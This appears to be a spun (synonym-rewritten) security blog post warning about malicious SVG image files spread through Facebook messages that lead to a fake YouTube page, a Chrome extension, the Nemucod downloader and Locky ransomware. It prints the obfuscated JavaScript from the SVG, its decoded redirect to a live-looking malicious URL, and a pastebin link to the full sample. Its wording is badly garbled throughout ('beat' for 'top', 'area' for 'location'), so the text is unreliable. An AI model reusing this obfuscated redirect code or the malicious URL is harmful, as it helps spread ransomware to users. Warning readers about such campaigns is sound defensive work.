اخر الاخبار

Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages



Have you gotten any sort of Image document through Facebook messages of late?

In the event that yes, Is it in SVG Format?

In the event that it is, Please don't tap on it.

Facebook Spam in messages

Spammers have created malignant Image (SVG document) that will make you introduce ransomeware on to your System and thusly taint the greater part of your companions through a similar medium i.e Facebook messages.

Versatile Vector Graphics (SVG) is a XML-based picture design used to serve vector pictures. On the off chance that you see, Our logo is additionally in SVG design. You can download and investigate it by opening the document in a content tool.

The reason the spammers utilize SVG pictures for spamming is on the grounds that it permits dynamic substance. Spammers had included noxious JavaScript code ideal inside the picture itself, which for this situation was a connection to an outside record which would thus download locky Ransomeware.

What might happen on the off chance that you click that Spam Image?

You can checkout the SVG record code here:

http://pastebin.com/Ma5t0Fj0

On the off chance that you take a gander at the SVG document on pastebin, Observe the lines 48 to 51

var hdekw = window;

var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);

var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);

var lpvxzt = bxtqxbl("nso6/z",2,false);

hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);

Spammers have keenly utilized cryptographic methods to sidestep Facebook's record checkers and after that execute a window work.

On the off chance that you log these factors in comfort:

console.log(ljfji);

console.log(pryyb);

console.log(lpvxzt);

console.log(bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true));

You would get this:

beat

area

href

http://mourid.com/php/trust.php

Obviously it gives the idea that the malevolent SVG record is endeavoring to divert you to http://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will compel you to introduce noxious Chrome Extension.

Facebook SPAM in SVG record

At the point when the augmentation gets introduced, It would then exploits your program's entrance to your Facebook record to clandestinely SPAM your companions with the same SVG picture document, Helping this SPAM to Spread more.

Besides, The augmentation additionally downloads "Nemucod downloader", which is a non specific malware downloader by and large used to get and introduce different ransomeware. For this situation the malware downloader downloads "Locky ransomeware", leaving your framework bolted.

You can read more about ransomeware in my past post on Rise of noxious JavaScript